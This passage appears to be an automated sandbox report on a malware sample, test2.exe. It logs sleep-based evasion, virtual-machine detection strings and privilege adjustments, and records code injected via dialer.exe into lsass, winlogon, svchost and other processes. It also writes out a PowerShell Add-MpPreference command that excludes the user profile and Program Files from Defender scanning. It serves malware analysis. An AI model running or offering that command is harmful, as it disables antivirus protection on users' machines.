Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6832 | Thread sleep count: 255 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6832 | Thread sleep time: -255000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6832 | Thread sleep count: 9744 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6832 | Thread sleep time: -9744000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7892 | Thread sleep count: 221 > 30
Source: C:\Windows\System32\lsass.exe TID: 7892 | Thread sleep time: -221000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7892 | Thread sleep count: 9748 > 30
Source: C:\Windows\System32\lsass.exe TID: 7892 | Thread sleep time: -9748000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6480 | Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 6480 | Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6480 | Thread sleep count: 9737 > 30
Source: C:\Windows\System32\svchost.exe TID: 6480 | Thread sleep time: -9737000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1884 | Thread sleep count: 171 > 30
Source: C:\Windows\System32\dwm.exe TID: 1884 | Thread sleep time: -171000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1884 | Thread sleep count: 9719 > 30
Source: C:\Windows\System32\dwm.exe TID: 1884 | Thread sleep time: -9719000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1580 | Thread sleep count: 254 > 30
Source: C:\Windows\System32\svchost.exe TID: 1580 | Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1580 | Thread sleep count: 9744 > 30
Source: C:\Windows\System32\svchost.exe TID: 1580 | Thread sleep time: -9744000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6572 | Thread sleep count: 267 > 30
Source: C:\Windows\System32\svchost.exe TID: 6572 | Thread sleep time: -267000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6572 | Thread sleep count: 9732 > 30
Source: C:\Windows\System32\svchost.exe TID: 6572 | Thread sleep time: -9732000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7860 | Thread sleep count: 263 > 30
Source: C:\Windows\System32\svchost.exe TID: 7860 | Thread sleep time: -263000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7860 | Thread sleep count: 9734 > 30
Source: C:\Windows\System32\svchost.exe TID: 7860 | Thread sleep time: -9734000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6184 | Thread sleep count: 274 > 30
Source: C:\Windows\System32\svchost.exe TID: 6184 | Thread sleep time: -274000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6184 | Thread sleep count: 9722 > 30
Source: C:\Windows\System32\svchost.exe TID: 6184 | Thread sleep time: -9722000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6784 | Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 6784 | Thread sleep time: -246000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6784 | Thread sleep count: 9614 > 30
Source: C:\Windows\System32\svchost.exe TID: 6784 | Thread sleep time: -9614000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408 | Thread sleep count: 312 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408 | Thread sleep time: -312000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408 | Thread sleep count: 9687 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408 | Thread sleep time: -9687000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4220 | Thread sleep count: 317 > 30
Source: C:\Windows\System32\svchost.exe TID: 4220 | Thread sleep time: -317000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4220 | Thread sleep count: 9682 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4220Thread sleep time: -9682000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep count: 2611 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep time: -2611000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep count: 7376 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep time: -7376000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 9802 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 124 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4660Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep count: 4431 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep time: -4431000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep count: 5567 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep time: -5567000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep count: 4671 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -4671000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep count: 5327 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -5327000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep count: 5367 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep time: -5367000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep count: 4631 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep time: -4631000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep count: 5604 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep time: -5604000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep count: 4394 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep time: -4394000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep count: 5485 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep time: -5485000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep count: 4510 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep time: -4510000s >= -30000s
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep count: 4915 > 30
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep time: -491500s >= -30000s
      Source: C:\Windows\System32\dialer.exe TID: 7796Thread sleep count: 1672 > 30
      Source: C:\Windows\System32\dialer.exe TID: 7796Thread sleep time: -167200s >= -30000s
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep count: 3201 > 30
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep time: -320100s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep count: 9897 > 30
      Source: C:\Windows\System32\powercfg.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\dialer.exe Last function: Thread delayed
      Source: C:\Windows\System32\dialer.exe Last function: Thread delayed
      Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
      Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
      Source: powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: test2.exe, 00000000.00000002.4484891201.0000017A0A250000.00000004.00000001.00020000.00000000.sdmp, test2.exe, 00000000.00000000.4386773609.00007FF66155C000.00000008.00000001.01000000.00000003.sdmp, test2.exe, 00000000.00000002.4486780824.00007FF661581000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: Qemu%
      Source: test2.exe, 00000000.00000002.4484891201.0000017A0A250000.00000004.00000001.00020000.00000000.sdmp, test2.exe, 00000000.00000000.4386773609.00007FF66155C000.00000008.00000001.01000000.00000003.sdmp, test2.exe, 00000000.00000002.4486780824.00007FF661581000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: qemu%
      Source: svchost.exe, 0000001B.00000000.4484178513.000001F7E6C00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
      Source: lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: lsass.exe, 00000016.00000000.4432790887.00000207A9613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667028015.00000207A9613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.4440250228.000001AD5DC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.5668349724.000001AD5DC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.5669382634.0000021F1562B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.4481865070.0000021F1562B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.4484296968.000001F7E6C29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.5665569135.000001F7E6C29000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\test2.exe Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Program Files\Google\Chrome\updater.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Users\user\Desktop\test2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Program Files\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 2854D4A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 207A9DD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1AD5DBD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 1F5E4E40000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20C21EB0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21F155B0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F7E7490000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 248DE760000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2B79C800000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418340000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 276DFF70000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 25C22470000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2D45E7A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D05B7A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DA40000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F93870000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 28813580000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 2854D500000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 207AA820000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1AD5E910000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 1F5E4EA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20C21F10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21F15DD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F7E74F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 248DE7C0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2B79C860000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418CA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 276DFFD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 25C224D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2D45E800000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D05BE40000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DAA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F938D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 288135B0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24099670000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23C4EE30000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CF94FD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1859E0F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E099DB0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20541B40000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A83C320000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23092210000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23375660000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21CDFC50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23236730000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20BB2B50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CE39510000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23C2F6F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26A17C60000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\spoolsv.exe base: CA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1EFC9BA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1DE50F10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17660BD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 11F7E5D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20A36710000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 14F491D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A0A2600000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 22BEFFD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 18C35FB0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EC35F90000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 210BFBC0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 231A7AD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 281ED520000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 1B29C900000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C3354B0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\sihost.exe base: 20219540000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26F66570000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: BE0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C74BF50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 29902C80000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26C52290000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: 1DFBA830000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C27EF90000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\explorer.exe base: A850000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 240A7930000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 183ED2A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D37AF10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\SettingSyncHost.exe base: 1FEFD650000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27ADB570000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C4355A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17708DF0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1C0FD030000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 182E47D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 21671A10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 700000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 15357E10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 226DF760000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2C5EE060000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 256199A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BAD1F10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 298A7C30000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E928AC0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1AEC6560000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1CCAD210000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F4E9D50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 17E7E4F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1947A0F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Google\Chrome\updater.exe base: 2A663B10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C7FC420000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1A49CF30000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 29C55440000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 4D4A2908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\lsass.exe EIP: A9DD2908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5DBD2908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\dwm.exe EIP: E4E42908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 21EB2908
      Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 155B2908
